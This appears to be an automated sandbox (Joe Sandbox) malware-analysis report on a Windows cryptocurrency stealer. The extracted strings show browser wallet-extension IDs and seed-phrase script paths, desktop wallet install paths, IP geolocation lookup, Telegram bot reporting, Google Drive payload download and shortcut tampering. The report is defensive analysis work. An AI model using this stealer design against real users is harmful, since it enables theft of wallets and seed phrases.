_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0CA51
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0CA57
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0CA63
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0CA69
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0CA6F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0CA7B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0CA81

Strings

nkbihfbeogaeaoehlefnkodbefgpgknn, xrefs: 00007FF7ABC0C77B
lpfcbjknijpeeillifnkikgncikgfhdo, xrefs: 00007FF7ABC0C3C9
aholpfdialjgjfhomihkjbmgjidlcdno, xrefs: 00007FF7ABC0B6DE
Directories found:, xrefs: 00007FF7ABC0B652
\reset.js, xrefs: 00007FF7ABC0C47D
\pass.js, xrefs: 00007FF7ABC0B967
mcohilncbfahbmgdjkbpemcciiolgcge, xrefs: 00007FF7ABC0C5A6
hnfanknocfeofbddgcijnmhnfnkdnaad, xrefs: 00007FF7ABC0C1F4
bfnaelmomeimhlpmgjnjophhpkkoljpa, xrefs: 00007FF7ABC0B8B3
egjidjbpglichdcondbcbdnbeeppgdph, xrefs: 00007FF7ABC0BC65
hifafgmccdpekplomjjkcfgodnhcellj, xrefs: 00007FF7ABC0C017
\assets\js\popup.js, xrefs: 00007FF7ABC0C65A, 00007FF7ABC0C82F
\popup.js, xrefs: 00007FF7ABC0BD19, 00007FF7ABC0C2A8
fnjhmkhhmkbjkkabndcnnogagogbneec, xrefs: 00007FF7ABC0BE42
\js\script.js, xrefs: 00007FF7ABC0B792
\scripts\phrase.js, xrefs: 00007FF7ABC0C0CB
\assets\js\script.js, xrefs: 00007FF7ABC0BB44, 00007FF7ABC0BEF6
efbglgofoippbgcjepnhiblaibcnclgk, xrefs: 00007FF7ABC0BA90

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page
String ID: Directories found:$\assets\js\popup.js$\assets\js\script.js$\js\script.js$\pass.js$\popup.js$\reset.js$\scripts\phrase.js$aholpfdialjgjfhomihkjbmgjidlcdno$bfnaelmomeimhlpmgjnjophhpkkoljpa$efbglgofoippbgcjepnhiblaibcnclgk$egjidjbpglichdcondbcbdnbeeppgdph$fnjhmkhhmkbjkkabndcnnogagogbneec$hifafgmccdpekplomjjkcfgodnhcellj$hnfanknocfeofbddgcijnmhnfnkdnaad$lpfcbjknijpeeillifnkikgncikgfhdo$mcohilncbfahbmgdjkbpemcciiolgcge$nkbihfbeogaeaoehlefnkodbefgpgknn
API String ID: 4261731725-745990702
Opcode ID: eed29142c0b17473f8e06e9c831029cfc41bd86864cffae7e9f34e7c1f3a7299
Instruction ID: 439b6abe43a3ad55bb53c090fe7796c9f9dfacd95505911a2020f008ad37d3e0
Opcode Fuzzy Hash: eed29142c0b17473f8e06e9c831029cfc41bd86864cffae7e9f34e7c1f3a7299
Instruction Fuzzy Hash: 3AD2BF22F19B8285FB00EB68D0047BD6362AB55798F829731DE6C176FADF78E1C49350

Function 00007FF7ABC06970 Relevance: 64.0, APIs: 25, Strings: 11, Instructions: 1031COMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF7ABC06A07

Strings

ios_base::eofbit set, xrefs: 00007FF7ABC079A7
", xrefs: 00007FF7ABC06B24
Failed to open ZIP file: , xrefs: 00007FF7ABC0787D
Extracted: , xrefs: 00007FF7ABC0765F
Failed to initialize ZIP archive: , xrefs: 00007FF7ABC06B2D
ios_base::failbit set, xrefs: 00007FF7ABC079A0
create_directories, xrefs: 00007FF7ABC0790B, 00007FF7ABC0793E, 00007FF7ABC07A20
Failed to get entry info for index: , xrefs: 00007FF7ABC06C98
ios_base::badbit set, xrefs: 00007FF7ABC07994
Failed to extract entry: , xrefs: 00007FF7ABC073A2
Failed to create output file: , xrefs: 00007FF7ABC07155

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: __std_fs_code_page
String ID: "$Extracted: $Failed to create output file: $Failed to extract entry: $Failed to get entry info for index: $Failed to initialize ZIP archive: $Failed to open ZIP file: $create_directories$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1686256323-3304824404
Opcode ID: d314fcfd26f6d6dfe77f394f4801bb09af6696e241a6e80ffde583f199b1b72e
Instruction ID: 5daab467ead71886b0dea79436d90e072f80be242db7b56bf588a3f2c5788ed7
Opcode Fuzzy Hash: d314fcfd26f6d6dfe77f394f4801bb09af6696e241a6e80ffde583f199b1b72e
Instruction Fuzzy Hash: 1DA2D472B15B8685EB14AF2CD444BEDA361FB44798F914632DA6D17AFADF38E180C310

Function 00007FF7ABC110F0 Relevance: 60.5, APIs: 25, Strings: 9, Instructions: 1005COMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF7ABC111B4

Part of subcall function 00007FF7ABC3E0B4: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF7ABC03F96), ref: 00007FF7ABC3E0C6

Part of subcall function 00007FF7ABC03AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF7ABC03B25
Part of subcall function 00007FF7ABC03AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF7ABC03BCA

__std_fs_code_page.LIBCPMT ref: 00007FF7ABC1128E
__std_fs_code_page.LIBCPMT ref: 00007FF7ABC1191B
__std_fs_code_page.LIBCPMT ref: 00007FF7ABC11E27
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC120BA

Part of subcall function 00007FF7ABC42A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC42A68
Part of subcall function 00007FF7ABC42A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC42A6E

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC120D8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC120F3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC120F9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC120FF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC12105
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1210B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC12111
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC12117
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1211D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC12123
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC12129
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC1212F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC12135
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1213B
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC12141
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC12147
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1216B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC12177
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1217D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC12183

Strings

Download failed, xrefs: 00007FF7ABC11F25
exists, xrefs: 00007FF7ABC120CB, 00007FF7ABC1219B
remove, xrefs: 00007FF7ABC12158
.zip, xrefs: 00007FF7ABC11680
C:\Program Files\Google\Chrome\Extensions, xrefs: 00007FF7ABC11189
Extensions count: , xrefs: 00007FF7ABC114EF
create_directories, xrefs: 00007FF7ABC120E6
Profiles count: , xrefs: 00007FF7ABC113AF
.lck, xrefs: 00007FF7ABC1181F

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_fs_code_page$__std_fs_convert_narrow_to_wide$ApisFile
String ID: .lck$.zip$C:\Program Files\Google\Chrome\Extensions$Download failed$Extensions count: $Profiles count: $create_directories$exists$remove
API String ID: 3708190391-83527870
Opcode ID: e2076c5f7d4301a157191b0b03ad3eb607ac393870201ef6c63db0fd2655afcf
Instruction ID: 5193dc6dba4751d168976b9f7f5289896d714732c3bd253eb5d667298f2fa313
Opcode Fuzzy Hash: e2076c5f7d4301a157191b0b03ad3eb607ac393870201ef6c63db0fd2655afcf
Instruction Fuzzy Hash: 1CA2F572A15B8285EB10EF28E4447ADA761FB85798F914331EA6C17BF9EF38D580D310

Function 00007FF7ABC13CE0 Relevance: 53.4, APIs: 19, Strings: 11, Instructions: 876
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET ref: 00007FF7ABC13DAB
InternetOpenUrlA.WININET ref: 00007FF7ABC13ECC
InternetCloseHandle.WININET ref: 00007FF7ABC13EF8
InternetReadFile.WININET ref: 00007FF7ABC13F5E
InternetReadFile.WININET ref: 00007FF7ABC13FD4
InternetCloseHandle.WININET ref: 00007FF7ABC13FE1
InternetCloseHandle.WININET ref: 00007FF7ABC13FEA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC14C3F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC14C45
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC14C4B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC14C57
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC14C5D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC14C63
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC14C69
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC14C6F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC14C75
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC14C7B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC14C81
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC14C87

Strings

Error parsing JSON response: , xrefs: 00007FF7ABC14A52
city, xrefs: 00007FF7ABC144F1
https://ipinfo.io/json, xrefs: 00007FF7ABC13EC2
Could not fetch IP, xrefs: 00007FF7ABC13D4E
country, xrefs: 00007FF7ABC143DB
region, xrefs: 00007FF7ABC1446F
InternetOpenUrl failed., xrefs: 00007FF7ABC13EDA
Location not available, xrefs: 00007FF7ABC13D80
N/A, xrefs: 00007FF7ABC14204, 00007FF7ABC143C1, 00007FF7ABC14455, 00007FF7ABC144DA
IPInfoFetcher, xrefs: 00007FF7ABC13DA4
InternetOpen failed., xrefs: 00007FF7ABC13DBD

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Internet$CloseHandle$FileOpenRead
String ID: Could not fetch IP$Error parsing JSON response: $IPInfoFetcher$InternetOpen failed.$InternetOpenUrl failed.$Location not available$N/A$city$country$https://ipinfo.io/json$region
API String ID: 427349759-3899726476
Opcode ID: e5f0cd9ad887f1bff8791332fe58ff332ab910a150e907871e22586303550f00
Instruction ID: 475da2825f68a3ea55b0d70f22407c37c97e07e8c438ab6c0226b447bb3be2fb
Opcode Fuzzy Hash: e5f0cd9ad887f1bff8791332fe58ff332ab910a150e907871e22586303550f00
Instruction Fuzzy Hash: 0092C632A167C245EB20EF28D854BEDA351EB85798F815631DA5D1BAFADF3CD244C320

Function 00007FF7ABC07C50 Relevance: 53.3, APIs: 19, Strings: 11, Instructions: 827comCOMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF7ABC07CEE

Part of subcall function 00007FF7ABC3E0B4: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF7ABC03F96), ref: 00007FF7ABC3E0C6

Part of subcall function 00007FF7ABC03AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF7ABC03B25
Part of subcall function 00007FF7ABC03AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF7ABC03BCA

__std_fs_code_page.LIBCPMT ref: 00007FF7ABC07D7A
__std_fs_code_page.LIBCPMT ref: 00007FF7ABC07EBB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC08486
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0848C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC084A6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC084BD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC084C3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC084C9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC084CF
CoInitialize.OLE32 ref: 00007FF7ABC0850E
CoCreateInstance.OLE32 ref: 00007FF7ABC0853A

Strings

exists, xrefs: 00007FF7ABC08479
C:\Users, xrefs: 00007FF7ABC07CAA
directory_iterator::directory_iterator, xrefs: 00007FF7ABC08499
Failed to get IPersistFile interface., xrefs: 00007FF7ABC086BE
does not exist or is not accessible., xrefs: 00007FF7ABC083D2
Failed to save shortcut file., xrefs: 00007FF7ABC0874F
Failed to create ShellLink COM object., xrefs: 00007FF7ABC0855D
User: , xrefs: 00007FF7ABC08015
status, xrefs: 00007FF7ABC08463
The directory , xrefs: 00007FF7ABC083A5
directory_entry::status, xrefs: 00007FF7ABC084B0

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page$__std_fs_convert_narrow_to_wide$ApisCreateFileInitializeInstance
String ID: does not exist or is not accessible.$C:\Users$Failed to create ShellLink COM object.$Failed to get IPersistFile interface.$Failed to save shortcut file.$The directory $User: $directory_entry::status$directory_iterator::directory_iterator$exists$status
API String ID: 2171753736-278810226
Opcode ID: 4714100c39652c6780bc2cec19bb84f0fb8848c9b67a89fbf350328451bfeb0b
Instruction ID: efbcaa1bb515e549a1cceb8b5ce2baebdc1ce7166b0be630ef64354a0755aa54
Opcode Fuzzy Hash: 4714100c39652c6780bc2cec19bb84f0fb8848c9b67a89fbf350328451bfeb0b
Instruction Fuzzy Hash: F172D462F16B4285EB10AB69D4446BDA761FB84BA4F818632DE5C17BF9DF3CE580C310

Function 00007FF7ABC09B00 Relevance: 48.0, APIs: 17, Strings: 10, Instructions: 741fileCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FF7ABC09B53
FindFirstFileW.KERNEL32 ref: 00007FF7ABC09BC8
DeleteFileW.KERNEL32 ref: 00007FF7ABC0A537
FindNextFileW.KERNELBASE ref: 00007FF7ABC0A6EE
FindClose.KERNEL32 ref: 00007FF7ABC0A71B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0A76D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0A773
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0A77F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0A785
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC0A78B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0A791
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0A7C5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0A7DC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0A7E2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0A7E8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0A7EE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0A7FC

Strings

exists, xrefs: 00007FF7ABC0A7A4
Deleted: , xrefs: 00007FF7ABC0A541
\Desktop, xrefs: 00007FF7ABC09E67
directory_iterator::directory_iterator, xrefs: 00007FF7ABC0A7B8
USERPROFILE, xrefs: 00007FF7ABC09B4C
.lnk, xrefs: 00007FF7ABC0A1F3
Failed to delete: , xrefs: 00007FF7ABC0A569
C:\Users\, xrefs: 00007FF7ABC09B82
Error finding user directories, xrefs: 00007FF7ABC09C41
directory_entry::status, xrefs: 00007FF7ABC0A7CF

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$FileFind$CloseConcurrency::cancel_current_taskDeleteEnvironmentFirstNextVariable
String ID: .lnk$C:\Users\$Deleted: $Error finding user directories$Failed to delete: $USERPROFILE$\Desktop$directory_entry::status$directory_iterator::directory_iterator$exists
API String ID: 1014275803-3111992417
Opcode ID: cc9a03327077175d19d1366ffedd642dcfda8266f1f419181d5486607274d4fb
Instruction ID: 9a64f025e5cd94a01c3eb1630ffd317871aba9bc142dd78a4aba23b31a2a4287
Opcode Fuzzy Hash: cc9a03327077175d19d1366ffedd642dcfda8266f1f419181d5486607274d4fb
Instruction Fuzzy Hash: 1D72B672A197C681EA20AB1DE4447BEE361FB85BA4F814231EAAD036F5DF7CD584C710

Function 00007FF7ABC14D20 Relevance: 40.7, APIs: 15, Strings: 8, Instructions: 446
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET ref: 00007FF7ABC14D81
InternetOpenUrlA.WININET ref: 00007FF7ABC15232
InternetReadFile.WININET ref: 00007FF7ABC15255
InternetReadFile.WININET ref: 00007FF7ABC15306
InternetCloseHandle.WININET ref: 00007FF7ABC15317
InternetCloseHandle.WININET ref: 00007FF7ABC15388
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1540E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC15414
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC15420
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC15426
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1542C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC15432
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC15438
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1543E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1544A

Strings

&parse_mode=HTML, xrefs: 00007FF7ABC15071
TelegramBot, xrefs: 00007FF7ABC14D7A
/sendMessage?chat_id=, xrefs: 00007FF7ABC14F57
https://api.telegram.org/bot, xrefs: 00007FF7ABC14F40
InternetOpenUrl failed., xrefs: 00007FF7ABC15337
&text=, xrefs: 00007FF7ABC14FE6
%%%02X, xrefs: 00007FF7ABC14EC5
InternetOpen failed., xrefs: 00007FF7ABC14DAB

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Internet$CloseFileHandleOpenRead
String ID: %%%02X$&parse_mode=HTML$&text=$/sendMessage?chat_id=$InternetOpen failed.$InternetOpenUrl failed.$TelegramBot$https://api.telegram.org/bot
API String ID: 490362910-2071712312
Opcode ID: 2116c08122732905607294f5540b89ffce0c194dcefc27091b70f05a335ee373
Instruction ID: 8d9b1aa6cd4c2b2531630d9d16c2aa6e5696832b9ab52b8d9849ae09778f5990
Opcode Fuzzy Hash: 2116c08122732905607294f5540b89ffce0c194dcefc27091b70f05a335ee373
Instruction Fuzzy Hash: 5212F862E15B8146FB00EB38E4447BDA761FB957A8F915331EA6C16AF6DF78E180C310

Function 00007FF7ABC06190 Relevance: 38.9, APIs: 12, Strings: 10, Instructions: 360
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET ref: 00007FF7ABC06434
InternetOpenUrlA.WININET ref: 00007FF7ABC064D5
InternetReadFile.WININET ref: 00007FF7ABC06593
InternetReadFile.WININET ref: 00007FF7ABC065CD
InternetCloseHandle.WININET ref: 00007FF7ABC065E3
InternetCloseHandle.WININET ref: 00007FF7ABC065EC
InternetCloseHandle.WININET ref: 00007FF7ABC066DA
InternetCloseHandle.WININET ref: 00007FF7ABC066E3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0674B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0675D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC06763
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC06769

Strings

URL: , xrefs: 00007FF7ABC0634F
FileDownloader, xrefs: 00007FF7ABC0642D
*, xrefs: 00007FF7ABC06617
https://drive.google.com/uc?id=, xrefs: 00007FF7ABC06223
InternetOpenUrl failed., xrefs: 00007FF7ABC064FB
DST: , xrefs: 00007FF7ABC063D0
&export=download, xrefs: 00007FF7ABC0623B
Failed to open file for writing., xrefs: 00007FF7ABC06689
File downloaded successfully and saved as , xrefs: 00007FF7ABC06620
InternetOpen failed., xrefs: 00007FF7ABC0645A

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Internet$CloseHandle_invalid_parameter_noinfo_noreturn$FileOpenRead
String ID: &export=download$*$DST: $Failed to open file for writing.$File downloaded successfully and saved as $FileDownloader$InternetOpen failed.$InternetOpenUrl failed.$URL: $https://drive.google.com/uc?id=
API String ID: 1313048855-3858291459
Opcode ID: f90a2fdffaa1c6873038af76952001493e8ca45214174326fbfaffb7a70e20a2
Instruction ID: 290d259be959b0c2a5c53d03cde93ad5493d1cc5bf148331fb25cc81c586822a
Opcode Fuzzy Hash: f90a2fdffaa1c6873038af76952001493e8ca45214174326fbfaffb7a70e20a2
Instruction Fuzzy Hash: C4F1C462F19B4642EA10EF6CD444BBDA361FB857A4F914231EA6C06AF9DF7CE480D710

Function 00007FF7ABC08A90 Relevance: 33.4, APIs: 5, Strings: 14, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NetUserEnum.NETAPI32(?,?,?,?,?,00000000,?,00007FF7ABC093EA), ref: 00007FF7ABC08B31
WideCharToMultiByte.KERNEL32(?,?,?,?,?,00000000,?,00007FF7ABC093EA), ref: 00007FF7ABC08B92
WideCharToMultiByte.KERNEL32(?,?,?,?,?,00000000,?,00007FF7ABC093EA), ref: 00007FF7ABC08BE6
NetApiBufferFree.NETAPI32(?,?,?,?,?,00000000,?,00007FF7ABC093EA), ref: 00007FF7ABC08C72
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC08CB9

Strings

C:\Program Files\Trezor Suite, xrefs: 00007FF7ABC09268
C:\Program Files (x86)\Electrum, xrefs: 00007FF7ABC09338
C:\ProgramData\%s\exodus, xrefs: 00007FF7ABC09110
C:\Users\%s\AppData\Local\exodus, xrefs: 00007FF7ABC09160
Electrum, xrefs: 00007FF7ABC0936A
Ledger Live, xrefs: 00007FF7ABC092FF
C:\Users\%s\AppData\Local\Programs\atomic, xrefs: 00007FF7ABC091B0
exists, xrefs: 00007FF7ABC08F47
Trezor, xrefs: 00007FF7ABC0922F, 00007FF7ABC0929A
C:\Program Files\Ledger Live, xrefs: 00007FF7ABC092D0
Atomic, xrefs: 00007FF7ABC091D6
Exodus, xrefs: 00007FF7ABC09136, 00007FF7ABC09186
status, xrefs: 00007FF7ABC08F58
C:\Users\%s\AppData\Local\Programs\Trezor Suite, xrefs: 00007FF7ABC09203

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: ByteCharMultiWide$BufferEnumFreeUser_invalid_parameter_noinfo_noreturn
